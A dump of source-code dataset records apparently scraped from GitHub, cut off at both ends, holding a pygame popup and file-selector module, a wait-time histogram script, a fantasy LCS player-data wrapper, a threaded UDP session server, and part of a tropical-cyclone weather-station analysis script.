2)\n\t\n\tyoff=bgrect.y+2\n\tyjump=uitextsize\n\t#lineren=simplefont.render(info, True, (255, 255, 255), (30, 30, 30))\n\tlineren=textrender(info, uitextsize, uifgcolor, uibgcolor, 0)\n\tscreensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+0))\n\tyoff+=yjump\n\tif extra!=None:\n\t\t#lineren=simplefont.render(extra, True, (255, 255, 255), (30, 30, 30))\n\t\tlineren=textrender(extra, uitextsize, uifgcolor, uibgcolor, 0)\n\t\tscreensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+0))\n\t\tyoff+=yjump\n\tif extra2!=None:\n\t\t#lineren=simplefont.render(extra2, True, (255, 255, 255), (30, 30, 30))\n\t\tlineren=textrender(extra2, uitextsize, uifgcolor, uibgcolor, 0)\n\t\tscreensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+0))\n\t\tyoff+=yjump\n\t#lineren=simplefont.render(\"Press any key or click to continue\", True, (255, 255, 255), (30, 30, 30))\n\tlineren=textrender(\"Press any key or click to continue\", uitextsize, uifgcolor, uibgcolor, 0)\n\tscreensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+0))\n\tyoff+=yjump\n\tpygame.display.update()\n\twhile True:\n\t\ttime.sleep(0.1)\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == QUIT:\n\t\t\t\treturn\n\t\t\tif event.type == KEYDOWN:\n\t\t\t\treturn\n\t\t\tif event.type==MOUSEBUTTONDOWN:\n\t\t\t\treturn\n\ndef YNpop(info):\n\tscreensurf=pygame.display.get_surface()\n\tbgrect=pygame.Rect(0, 0, screensurf.get_width()//1.8, 6*uitextsize)\n\tbgrect.centerx=(screensurf.get_width()//2)\n\tbgrect.centery=(screensurf.get_height()//2)\n\tpygame.draw.rect(screensurf, uibgcolor, bgrect)\n\tdzulib.trace3dbox(screensurf, uibgcolor, bgrect, 2)\n\tyoff=bgrect.y+2\n\tyjump=uitextsize\n\t#lineren=simplefont.render(info, True, (255, 255, 255), (30, 30, 30))\n\tlineren=textrender(info, uitextsize, uifgcolor, uibgcolor, 0)\n\tscreensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+0))\n\tyoff+=yjump\n\t#lineren=simplefont.render(\"(Y)es or (N)o?\", True, (255, 255, 255), (30, 30, 30))\n\tlineren=textrender(\" (Y)es \", uitextsize, uifgcolor, dzulib.colorboost(uibgcolor, 40), 0)\n\tyesrect=screensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+0))\n\tyoff+=yjump\n\tlineren=textrender(\" (N)o \", uitextsize, uifgcolor, dzulib.colorboost(uibgcolor, 40), 0)\n\tnorect=screensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+0))\n\tyoff+=yjump\n\tpygame.display.update()\n\twhile True:\n\t\ttime.sleep(0.1)\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == QUIT:\n\t\t\t\treturn 0\n\t\t\tif event.type == KEYDOWN and event.key == K_n:\n\t\t\t\treturn 0\n\t\t\tif event.type == KEYDOWN and event.key == K_y:\n\t\t\t\treturn 1\n\t\t\tif event.type==MOUSEBUTTONDOWN:\n\t\t\t\tif yesrect.collidepoint(event.pos):\n\t\t\t\t\treturn 1\n\t\t\t\tif norect.collidepoint(event.pos):\n\t\t\t\t\treturn 0\n\nsavepath=\"save\"\n\ndef charremove(string, indexq):\n\tif indexq==0:\n\t\treturn string\n\telse:\n\t\treturn (string[:(indexq-1)] + string[(indexq):])\ndef charinsert(string, char, indexq):\n\tif indexq==0:\n\t\treturn char + string\n\telse:\n\t\treturn (string[:(indexq-1)] + char + string[(indexq-1):])\n\n\n\ndef fileselect(title):\n\tscreensurf=pygame.display.get_surface()\n\tcuroffset=0\n\tredraw=1\n\ttextstring=\"\"\n\tpathlist=sorted(os.listdir(os.path.join(savepath, '.')), key=str.lower)\n\twhile True:\n\t\ttime.sleep(0.1)\n\t\tif redraw==1:\n\t\t\tredraw=0\n\t\t\tyoff=2\n\t\t\tyjump=uitextsize+1\n\t\t\tbgrect=pygame.Rect(0, 50, screensurf.get_width()//2, screensurf.get_height())\n\t\t\tbgrect.centerx=(screensurf.get_width()//2)\n\t\t\tbgrect.centery=(screensurf.get_height()//2)\n\t\t\tyoff=bgrect.y+2\n\t\t\tpygame.draw.rect(screensurf, uibgcolor, bgrect)\n\t\t\tdzulib.trace3dbox(screensurf, uibgcolor, bgrect, 2)\n\t\t\t#pygame.draw.rect(screensurf, (255, 255, 255), bgrect, 1)\n\t\t\t#lineren=simplefont.render(title, True, (255, 255, 255), (30, 30, 30))\n\t\t\tlineren=textrender(title, uitextsize, uifgcolor, uibgcolor, 0)\n\t\t\tscreensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+50))\n\t\t\tyoff+=yjump\n\t\t\tlinedict={}\n\t\t\tfor line in pathlist:\n\t\t\t\tif line.endswith('.sav'):\n\t\t\t\t\tif line.split(\".\")[0]==textstring:\n\t\t\t\t\t\tlineren=textrender(line, uitextsize, uibgcolor, dzulib.colorboost(uifgcolor, 40), 0)\n\t\t\t\t\telse:\n\t\t\t\t\t\tlineren=textrender(line, uitextsize, uifgcolor, dzulib.colorboost(uibgcolor, 40), 0)\n\t\t\t\t\tbxrect=screensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+50))\n\t\t\t\t\tyoff+=yjump\n\t\t\t\t\tlinedict[line.split(\".\")[0]]=bxrect\n\t\t\t\n\t\t\t#abttextB=simplefont.render(textstring+\".sav\", True, (255, 255, 255), (40, 40, 40))\n\t\t\tabttextB=textrender(textstring+\".sav\", uitextsize, uibgcolor, dzulib.colorboost(uifgcolor, 40), 0)\n\t\t\tpygame.draw.line(screensurf, dzulib.colorboost(uibgcolor, 40), (bgrect.x, yoff+yjump*2), (bgrect.x+bgrect.w, yoff+yjump*2), 2)\n\t\t\tscreensurf.blit(abttextB, (screensurf.get_width()//2-abttextB.get_width()//2, yoff+yjump*3))\n\t\t\tpygame.display.update()\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type==MOUSEBUTTONDOWN:\n\t\t\t\tfor rectbx in linedict:\n\t\t\t\t\tif linedict[rectbx].collidepoint(event.pos):\n\t\t\t\t\t\tif rectbx==textstring:\n\t\t\t\t\t\t\treturn rectbx+\".sav\"\n\t\t\t\t\t\ttextstring=rectbx\n\t\t\t\t\t\tredraw=1\n\t\t\t\tif not bgrect.collidepoint(event.pos):\n\t\t\t\t\treturn None\n\t\t\tif event.type == KEYDOWN and event.key == K_BACKSPACE:\n\t\t\t\tif len(textstring)!=0 and curoffset!=0:\n\t\t\t\t\ttextstring=charremove(textstring, curoffset)\n\t\t\t\t\tcuroffset -= 1\n\t\t\t\t\tredraw=1\n\t\t\t\tbreak\n\t\t\telif event.type == KEYDOWN and event.key == K_ESCAPE:\n\t\t\t\treturn None\n\t\t\telif event.type == KEYDOWN and event.key == K_RETURN:\n\t\t\t\tif textstring!=\"\":\n\t\t\t\t\treturn textstring+ \".sav\"\n\t\t\t\telse:\n\t\t\t\t\tOKpop(\"\\\".sav\\\" is not a valid name.\")\n\t\t\t\t\treturn None\n\t\t\telif event.type == KEYDOWN and event.key != K_TAB:\n\t\t\t\tcuroffset += 1\n\t\t\t\ttextstring=charinsert(textstring, str(event.unicode), curoffset)\n\t\t\t\tredraw=1\n\t\t\t\tbreak\n\t","repo_name":"ThomasTheSpaceFox/Desutezeoid","sub_path":"dzuinter.py","file_name":"dzuinter.py","file_ext":"py","file_size_in_byte":6501,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"42381313463","text":"import matplotlib.pyplot as plt\n\nf = open(\"/Users/saimonish/IntelliJ_workspace/ACSEF2021/waiting_times.txt\", \"r\")\n\nwaittimes = []\narray = [0]*400\nfor j in array:\n x = f.readline()\n if x != \"==== \\n\":\n waittimes.append(int(x))\n\n# frequencies\n\n\n# setting the ranges and no. of intervals\nrange = (0, 10)\nbins = 10\n\n# plotting a histogram\nplt.hist(waittimes, bins, range, color = 'green',\n histtype = 'bar', rwidth = 0.8)\n\n# x-axis label\nplt.xlabel('No. of Units Waited')\n# frequency label\nplt.ylabel('No. of cars')\n# plot title\nplt.title('Wait Time of Each Car')\n\n# function to show the plot\nplt.show()\n\nplt.savefig(\"/Users/saimonish/IntelliJ_workspace/ACSEF2021/Data_Analysys_Graph.png\")","repo_name":"SpartanSai/ACSEF2021","sub_path":"Data_Analysis_Graph.py","file_name":"Data_Analysis_Graph.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8481791067","text":"class PlayerDataException(Exception):\n \"\"\"Handles PlayerData Exceptions\"\"\"\n\n\nclass PlayerData:\n \"\"\"Handles Player Data requests\"\"\"\n\n def __init__(self, season, player):\n self.profile_data = self._get_profile(season, player)\n self.match_data = self._get_match_data(season)\n self.projected_data = self._get_projected_data(season)\n\n def _get_profile(self, season, player):\n \"\"\"\n Returns profile data of the player\n\n @param player - id or name of the player to look up\n \"\"\"\n try:\n try:\n player = int(player)\n except ValueError:\n player = player.lower()\n player_list = season.get_season_data()[\"proPlayers\"]\n for p in player_list:\n if p[\"id\"] == player:\n return p\n if p[\"name\"].lower() == player:\n return p\n except Exception as e:\n error_msg = (\"Failed to retrieve player profile data: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def _get_match_data(self, season):\n \"\"\"\n Returns match data related to player\n \"\"\"\n try:\n match_data = []\n player_id = self.profile_data[\"id\"]\n matches = season.get_season_data()[\"stats\"][\"actualPlayerStats\"]\n for match in matches:\n if player_id == match[0]:\n match_data.append(match)\n return match_data\n except Exception as e:\n error_msg = (\"Failed to retrieve player match data: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def _get_projected_data(self, season):\n \"\"\"\n Returns projected match data related to player\n \"\"\"\n try:\n match_data = []\n player_id = self.profile_data[\"id\"]\n matches = season.get_season_data()[\"stats\"][\"projectedPlayerStats\"]\n for match in matches:\n if player_id == match[0]:\n match_data.append(match)\n return match_data\n except Exception as e:\n error_msg = (\"Failed to retrieve player match data: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_player_id(self):\n \"\"\"\n Returns the player id\n \"\"\"\n try:\n return self.profile_data[\"id\"]\n except Exception as e:\n error_msg = (\"Failed to retrieve player id: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_name(self):\n \"\"\"\n Returns the player name\n \"\"\"\n try:\n return self.profile_data[\"name\"]\n except Exception as e:\n error_msg = (\"Failed to retrieve player name: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_photo_url(self):\n \"\"\"\n Returns the photo url of the player\n \"\"\"\n try:\n return self.profile_data[\"photoUrl\"]\n except Exception as e:\n error_msg = (\"Failed to retrieve photo url: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_positions(self):\n \"\"\"\n Returns a list of all the player's positions\n \"\"\"\n try:\n return self.profile_data[\"positions\"]\n except Exception as e:\n error_msg = (\"Failed to retrieve a list of player positions: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_team_id(self):\n \"\"\"\n Returns the player's team id\n \"\"\"\n try:\n return self.profile_data[\"proTeamId\"]\n except Exception as e:\n error_msg = (\"Failed to retrieve the player's team id: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_riot_id(self):\n \"\"\"\n Returns the player's riot id\n \"\"\"\n try:\n return self.profile_data[\"riotId\"]\n except Exception as e:\n error_msg = (\"Failed to retrieve the player's riot id: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_trends_by_week(self):\n \"\"\"\n Returns a dictionary of all the player's weekly trends\n \"\"\"\n try:\n return self.profile_data[\"trendsByWeek\"]\n except Exception as e:\n error_msg = (\"Failed to retrieve weekly trends: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_matches_played(self):\n \"\"\"\n Returns the total matches played\n \"\"\"\n try:\n return len(self.match_data)\n except Exception as e:\n error_msg = (\"Failed to retrieve number of matches played: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_all_match_stats(self):\n \"\"\"\n Returns a list of all matches played by the player\n \"\"\"\n try:\n return self.match_data\n except Exception as e:\n error_msg = (\"Failed to retrieve all match stats: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_match_stats(self, match_number):\n \"\"\"\n Returns match stats of a player given a number in a range\n from the first match to the most recent match\n\n @param match_number - # of the match to get\n \"\"\"\n try:\n match_number = int(match_number)\n if not 0 <= match_number < len(self.match_data):\n raise Exception(\"Specified number is out of the match range: \"\n \"{}\".format(match_number))\n match_stats = self.match_data[match_number]\n return match_stats\n except Exception as e:\n error_msg = (\"Failed to retrieve match stats: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_all_projected_stats(self):\n \"\"\"\n Returns a list of all projected matches to be played by\n the player\n \"\"\"\n try:\n return self.projected_data\n except Exception as e:\n error_msg = (\"Failed to retrieve all projected stats: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_projected_stats(self, match_number):\n \"\"\"\n Returns projected stats of a player given a number in a range\n from the first match to the most recent match\n\n @param match_number - # of the match to get\n \"\"\"\n try:\n projected_number = int(match_number)\n if not 0 <= projected_number < len(self.projected_data):\n raise Exception(\"Specified number is out of the match range: \"\n \"{}\".format(match_number))\n projected_stats = self.projected_data[match_number]\n return projected_stats\n except Exception as e:\n error_msg = (\"Failed to retrieve match stats: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n","repo_name":"kodycode/Fantasy-LCS-API-Wrapper","sub_path":"fantasylcs/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":7470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40795897576","text":"##########################\n##\n## Code by Susan\n## padath314\n##\n##########################\n\nimport socket\nimport sys\nfrom UAP import UAP,Message\nimport time\nimport threading\nimport queue\n\nSESSION_TIMEOUT = 20 # Adjust this value as needed\n\nSESSIONS = {}\n\ndef PrintMessage(msg : Message, \n alternativeMessage = None,\n alternativeSequence = None):\n if alternativeMessage:\n msg.message = alternativeMessage\n if alternativeSequence:\n msg.seq = alternativeSequence\n print(f\"{hex(msg.sID)} [{msg.seq}] {msg.message}\")\n\nclass Session:\n def __init__(self, session_id, client_address, server_socket, active_sessions):\n self.session_id = session_id\n self.client_address = client_address\n self.last_activity_time = time.time()\n self.expected_sequence_number = 1\n self.server_socket = server_socket # Store the server socket\n self.active_sessions = active_sessions # Store the active sessions dictionary\n\n self.messages = queue.Queue() # Queue of packets for this session\n self.thread = None\n\n def is_hello(self, message):\n return message.command == UAP.CommandEnum.HELLO\n\n def update_activity_time(self):\n self.last_activity_time = time.time()\n\n def is_timedout(self):\n return time.time() - self.last_activity_time > SESSION_TIMEOUT\n\n def process_packet(self, received_message):\n # print(received_message)\n # Extract the sequence number from the received message\n received_sequence_number = received_message.seq\n\n if received_sequence_number == self.expected_sequence_number:\n # Process the packet as expected\n # print(f\"Received packet with sequence number {received_sequence_number}: {received_message.message}\")\n PrintMessage(received_message)\n self.expected_sequence_number += 1 # Update the expected sequence number\n elif received_sequence_number < self.expected_sequence_number:\n # Handle out-of-order packet (protocol error)\n # print(f\"Received out-of-order packet with sequence number {received_sequence_number}.\")\n PrintMessage(received_message, \"Message out of order\")\n #self.close_session()\n else:\n # Handle missing packets\n for missing_sequence_number in range(self.expected_sequence_number, received_sequence_number):\n # print(f\"Lost packet with sequence number {missing_sequence_number}\")\n PrintMessage(received_message, \n alternativeMessage=\"Packet Lost\",\n alternativeSequence=missing_sequence_number)\n # Update the expected sequence number\n self.expected_sequence_number = received_sequence_number + 1\n\n def close_session(self):\n # Send a GOODBYE message to the client\n goodbye_message = Message(UAP.CommandEnum.GOODBYE, 0, self.session_id, \"GOODBYE\")\n encoded_goodbye_message = goodbye_message.EncodeMessage()\n self.server_socket.sendto(encoded_goodbye_message, self.client_address)\n \n # Remove the session from active_sessions\n del self.active_sessions[self.session_id]\n\ndef session_thread_handler(server_socket, session_id):\n\n # Send a reply HELLO message back to the client\n session = SESSIONS[session_id]\n reply_message = Message(UAP.CommandEnum.HELLO, 0, session_id, \"Reply HELLO\")\n encoded_reply_message = reply_message.EncodeMessage()\n server_socket.sendto(encoded_reply_message, session.client_address)\n # print(\"Replies sent\")\n PrintMessage(reply_message, \"Session Started\")\n\n while True:\n # print('*')\n\n # Fetch session data from shared dictionary\n session = SESSIONS[session_id]\n\n # Session timeout\n if session.is_timedout():\n session.close_session()\n PrintMessage(Message( \n 0,\n session.expected_sequence_number,\n session_id,\n \"Closing session due to timeout\"\n ))\n quit()\n \n try:\n received_message, client_address = session.messages.get(block=False), session.client_address\n except:\n continue\n #print(f\"Received data from {client_address}: {received_message}\")\n\n if received_message.sID != session_id:\n raise RuntimeError(\"Recieved wrong session packet\")\n \n if received_message.command == UAP.CommandEnum.HELLO:\n raise RuntimeError(\"Recieved hello packet in thread\")\n\n elif received_message.command == UAP.CommandEnum.DATA:\n\n # Update the session's last activity time\n session.update_activity_time()\n\n session.process_packet(received_message)\n # Send an ALIVE message in response to the DATA message\n alive_message = Message(UAP.CommandEnum.ALIVE, 0, session_id, \"ALIVE\")\n encoded_alive_message = alive_message.EncodeMessage()\n server_socket.sendto(encoded_alive_message, client_address)\n \n elif received_message.command == UAP.CommandEnum.GOODBYE:\n #print(\"\\necievd goodbye\\n\")\n\n session.close_session()\n\n PrintMessage(received_message, \"Closing session\")\n\n quit()\n\n\ndef send_goodbye_to_inactive_sessions(active_sessions, server_socket):\n inactive_sessions = [session for session in active_sessions.values() if session.is_inactive()]\n \n for session in inactive_sessions:\n goodbye_message = Message(UAP.CommandEnum.GOODBYE, 0, session.session_id, \"GOODBYE\")\n encoded_goodbye_message = goodbye_message.EncodeMessage()\n server_socket.sendto(encoded_goodbye_message, session.client_address)\n del active_sessions[session.client_address]\n\n\ndef send_goodbye_to_active_sessions(active_sessions, server_socket):\n goodbye_message = Message(UAP.CommandEnum.GOODBYE, 0, 0, \"GOODBYE\") # Create a GOODBYE Message\n\n for session in active_sessions.values():\n encoded_goodbye_message = goodbye_message.EncodeMessage() # Encode the GOODBYE Message\n server_socket.sendto(encoded_goodbye_message, session.client_address)\n\ndef main(port, host='0.0.0.0'):\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n server_address = (host, port)\n print(f\"Waiting on host {host} and port {port}\")\n\n server_socket.bind(server_address)\n\n # Start main thread\n main_thread = threading.Thread(target=main_thread_handler, args=(server_socket,))\n main_thread.daemon = True\n main_thread.start()\n\n try:\n while True:\n stdin = input()\n if stdin == \"q\":\n print(\"Server quitting due to input\")\n quit()\n except KeyboardInterrupt:\n print(\"Server is quitting due to keyboard interrupt.\")\n quit()\n except Exception as e:\n print(e)\n finally:\n # Send GOODBYE message to all active sessions\n send_goodbye_to_active_sessions(SESSIONS, server_socket)\n # Close the socket and clean up\n server_socket.close()\n quit()\n\n\ndef main_thread_handler(server_socket):\n try:\n while True:\n # print('*')\n data, client_address = server_socket.recvfrom(1024)\n received_message = Message.DecodeMessage(data)\n #print(f\"Received data from {client_address}: {received_message}\")\n \n if received_message.command == UAP.CommandEnum.HELLO:\n session_id = received_message.sID\n \n if session_id not in SESSIONS:\n new_session = Session(session_id, client_address, server_socket, SESSIONS) # Pass server_socket and active_sessions\n if not new_session.is_hello(received_message):\n # Terminate the session if the initial message is not HELLO\n continue\n SESSIONS[session_id] = new_session\n else:\n SESSIONS[session_id].close_session()\n continue\n\n # Update the session's last activity time\n SESSIONS[session_id].update_activity_time()\n\n # Starting session thread\n session_thread = threading.Thread(target=session_thread_handler, args=(server_socket, session_id))\n session_thread.daemon = True\n session_thread.start()\n\n elif received_message.command == UAP.CommandEnum.DATA or received_message.command == UAP.CommandEnum.GOODBYE:\n session_id = received_message.sID\n if session_id not in SESSIONS:\n # Terminate the session if the DATA message is received without a HELLO\n continue\n\n SESSIONS[session_id].messages.put(received_message)\n \n #print(active_sessions)\n\n except KeyboardInterrupt:\n print(\"Server is quitting due to keyboard interrupt.\")\n except Exception as e:\n print(e)\n finally:\n # Send GOODBYE message to all active sessions\n send_goodbye_to_active_sessions(SESSIONS, server_socket)\n # Close the socket and clean up\n server_socket.close()\n\nif __name__ == \"__main__\":\n import sys\n if len(sys.argv) == 1:\n print(\"Usage: ThreadedUAPServer.py port [host]\")\n elif len(sys.argv) == 2:\n main(int(sys.argv[1]))\n else:\n main(int(sys.argv[1]), sys.argv[2])\n","repo_name":"unniisme/Networking","sub_path":"UDPcommunicator/ThreadedUAPServer.py","file_name":"ThreadedUAPServer.py","file_ext":"py","file_size_in_byte":9725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40983304403","text":"\"\"\"\nextract_TC_station_passage.py - find all TCs that pass within a defined distance\nof a weather station\n\nWe first calculate the closest point of approach (CPA) between a weather\nstation location and each TC track. For all records where the TC passes within\n2 degrees of the station, we store the date/time of the passage and the\ndistance of the CPA.\n\nFor each station, we then load the daily maximum wind gust observations, and\nextract the observations closest to the date/time of CPA, plus the observations\nfrom one day prior and one day after. We then take the maximum of those\nobservaations and assign that value to the cyclone event.\n\nWe check the observations for the day prior and after to ensure we capture the\nmaximum gust from the cyclone. It is possible that the CPA occurs on one day,\nbut the strongest gust may be on the next day\n\nNOTE: The wind speed observations are in m/s, but appear to be converted from\nthe original recording units of knots, then rounded to 1 decimal place. This\ncauses an element of anomalous clustering around specific values in the data\nrecorded in the files.\n\n\"\"\"\nimport os\nimport logging\nimport warnings\nimport pandas as pd\nimport geopandas as gpd\nfrom datetime import timedelta\n\nimport matplotlib.pyplot as plt\nfrom shapely.geometry import LineString\nfrom shapely.geometry import box as sbox\nfrom vincenty import vincenty\n\nlogger = logging.getLogger()\n\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\n\nTZ = {\"QLD\": 10, \"NSW\": 10, \"VIC\": 10,\n \"TAS\": 10, \"SA\": 9.5, \"NT\": 9.5,\n \"WA\": 8, \"ANT\": 0}\n\n\ndef filter_tracks_domain(df, minlon=90, maxlon=180, minlat=-40, maxlat=0):\n \"\"\"\n Takes a `DataFrame` and filters on the basis of whether the track interscts\n the given domain, which is specified by the minimum and maximum longitude\n and latitude.\n\n NOTE: This assumes the tracks and bounding box are in the same geographic\n coordinate system (i.e. generally a latitude-longitude coordinate system).\n It will NOT support different projections (e.g. UTM data for the bounds and\n geographic for the tracks).\n\n NOTE: This doesn't work if there is only one point for the track.\n\n :param df: :class:`pandas.DataFrame` that holds the TCLV data\n :param float minlon: minimum longitude of the bounding box\n :param float minlat: minimum latitude of the bounding box\n :param float maxlon: maximum longitude of the bounding box\n :param float maxlat: maximum latitude of the bounding box\n\n :returns: :class:`pd.DataFrame` of tracks that pass through the given box.\n \"\"\"\n logger.info(\"Filtering tracks to the given domain\")\n domain = sbox(minlon, minlat, maxlon, maxlat, ccw=False)\n tracks = df.groupby('num')\n tempfilter = tracks.filter(lambda x: len(x) > 1)\n filterdf = tempfilter.groupby('num').filter(\n lambda x: LineString(zip(x['lon'], x['lat'])).intersects(domain))\n return filterdf\n\n\ndef load_obs_tracks(trackfile: str, format: str) -> gpd.GeoDataFrame:\n \"\"\"\n Load track data from IBTrACS file, add geometry and CRS. Basic\n categorisation using minimum central pressure is applied.\n\n :param str trackfile: Path to BoM best track data file\n :param str format: Whether its a raw or QC'd BoM best track file\n\n :returns: :class:`geopandas.GeoDataFrame`\n \"\"\"\n logger.info(f\"Loading tracks from {trackfile}\")\n\n if format == 'QC':\n usecols = [0, 1, 2, 7, 8, 11, 12, 13]\n colnames = ['NAME', 'DISTURBANCE_ID', 'TM', 'LAT', 'LON',\n 'adj. ADT Vm (kn)', 'CP(CKZ(Lok R34,LokPOCI, adj. Vm),hPa)',\n 'POCI (Lok, hPa)']\n dtypes = [str, str, str, float, float, float, float, float]\n\n df = pd.read_csv(trackfile, usecols=usecols,\n dtype=dict(zip(colnames, dtypes)),\n na_values=[' '], nrows=13743)\n colrenames = {'DISTURBANCE_ID': 'num',\n 'TM': 'datetime',\n 'LON': 'lon', 'LAT': 'lat',\n 'adj. ADT Vm (kn)': 'vmax',\n 'CP(CKZ(Lok R34,LokPOCI, adj. Vm),hPa)': 'pmin',\n 'POCI (Lok, hPa)': 'poci'}\n df.rename(colrenames, axis=1, inplace=True)\n else:\n usecols = [0, 1, 2, 7, 8, 16, 20, 53]\n colnames = ['NAME', 'num', 'datetime',\n 'lat', 'lon', 'pmin', 'poci', 'vmax']\n dtypes = [str, str, str, float, float, float, float, float]\n df = pd.read_csv(trackfile, usecols=usecols, header=0, skiprows=5,\n names=colnames,\n dtype=dict(zip(colnames, dtypes)),\n na_values=[' '],)\n\n df['datetime'] = pd.to_datetime(\n df.datetime, format=\"%Y-%m-%d %H:%M\", errors='coerce')\n obstc = filter_tracks_domain(df)\n\n trackgdf = []\n for k, t in obstc.groupby('num'):\n segments = []\n for n in range(len(t.num) - 1):\n segment = LineString([[t.lon.iloc[n], t.lat.iloc[n]],\n [t.lon.iloc[n+1], t.lat.iloc[n+1]]])\n segments.append(segment)\n\n gdf = gpd.GeoDataFrame.from_records(t[:-1])\n gdf['geometry'] = segments\n gdf['category'] = pd.cut(gdf['pmin'],\n bins=[0, 930, 955, 970, 985, 990, 1020],\n labels=[5, 4, 3, 2, 1, 0])\n trackgdf.append(gdf)\n\n trackgdf = pd.concat(trackgdf)\n # WGS84 for IBTrACS - double check!\n trackgdf = trackgdf.set_crs(\"EPSG:4326\")\n return trackgdf\n\n\ndef load_stations(stationfile: str, dist: float) -> gpd.GeoDataFrame:\n \"\"\"\n Load weather station locations from a file, add geometry and a buffer to\n each feature.\n\n We put the station data into GDA 2020\n\n :param stationfile: Path to the station file\n :param dist: Buffer distance around each station - needs to be in the same\n units as the station coordinates (i.e. probably degrees)\n \"\"\"\n logger.info(f\"Loading stations from {stationfile}\")\n colnames = [\"id\", 'stnNum', 'rainfalldist', 'stnName', 'stnOpen',\n 'stnClose', 'stnLat', 'stnLon', 'stnLoc', 'stnState',\n 'stnElev', 'stnBarmoeterElev', 'stnWMOIndex',\n 'stnDataStartYear', 'stnDataEndYear', 'pctComplete',\n 'pctY', 'pctN', 'pctW', 'pctS', 'pctI']\n\n df = pd.read_csv(stationfile, sep=',', index_col=False,\n names=colnames, keep_default_na=False,\n header=0)\n gdf = gpd.GeoDataFrame(df,\n geometry=gpd.points_from_xy(\n df.stnLon, df.stnLat,\n crs=\"EPSG:7844\").buffer(dist)\n )\n gdf.set_index('stnNum', drop=False, inplace=True)\n return gdf\n\n\ndef load_obs_data(stationFile: str, stnState: str) -> pd.DataFrame:\n \"\"\"\n Load observations for a given station\n\n :param str stationFile: path to a file containing formatted daily\n observations of the maximum wind gust and the corresponding present\n and past weather conditions\n :param str stnState: abbreviated state name for the station. Required\n to determine UTC offset (obs datetimes are local time, TC datetimes are\n UTC)\n\n :returns: `pd.DataFrame` containing the observations, with datetime\n converted to UTC. Any records with missing/null maximum daily gust values\n are eliminated.\n \"\"\"\n logger.info(f\"Loading {stationFile}\")\n colnames = [\"dc\", \"stnNum\", \"Year\", \"Month\", \"Day\",\n \"gust\", \"gust_q\", \"direction\", \"direction_q\", \"time\", \"time_q\",\n \"preswx00\", \"Qpreswx00\", \"preswx03\", \"Qpreswx03\", \"preswx06\", \"Qpreswx06\",\n \"preswx09\", \"Qpreswx09\", \"preswx12\", \"Qpreswx12\", \"preswx15\", \"Qpreswx15\",\n \"preswx18\", \"Qpreswx18\", \"preswx21\", \"Qpreswx21\", \"pastwx00\", \"Qpastwx00\",\n \"pastwx03\", \"Qpastwx03\", \"pastwx06\", \"Qpastwx06\", \"pastwx09\", \"Qpastwx09\",\n \"pastwx12\", \"Qpastwx12\", \"pastwx15\", \"Qpastwx15\", \"pastwx18\", \"Qpastwx18\",\n \"pastwx21\", \"Qpastwx21\", \"Null\"]\n\n dtypes = [str, str, str, str, str, float, str, float, str, str, str,\n float, str, float, str, float, str, float, str, float, str,\n float, str, float, str, float, str, float, str, float, str,\n float, str, float, str, float, str, float, str, float, str,\n float, str, ]\n df = pd.read_csv(stationFile, names=colnames, sep=\",\", index_col=False,\n header=0, parse_dates={'datetime': [2, 3, 4, 9]},\n na_values=['', ' '], keep_default_na=False)\n # Change local time to UTC time. Have to assume we're not working with\n # DLS times - would be somewhat complex to determine, since some states\n # actually went thru periods of having DLS, but typically don't!\n df['datetime'] = df.datetime - timedelta(hours=TZ[stnState])\n # Drop rows with no gust observation\n df = df[~df.gust.isna()]\n return df\n\n\ndef calculateCPA(stationFile: str, trackFile: str, trackFormat: str) -> pd.DataFrame:\n \"\"\"\n Calculate the closest point of approach to each station for each cyclone.\n\n NOTE: Currently also writes the data to a csv file at a hard-coded location\n\n :param str stationFile: Full path to the list of available stations\n :param str trackFile: Full path to the best track data\n :param str trackFormat: either \"raw\" or \"QC\". Indicates which best track\n data to load\n\n :returns: `pd.DataFrame` with the datetime of each instance of a cyclone\n passage, along with distance, central pressure and poci of the storm at\n the time of CPA.\n \"\"\"\n tracks = load_obs_tracks(trackFile, trackFormat)\n stations = load_stations(stationFile, 2)\n stations.set_index('stnNum', 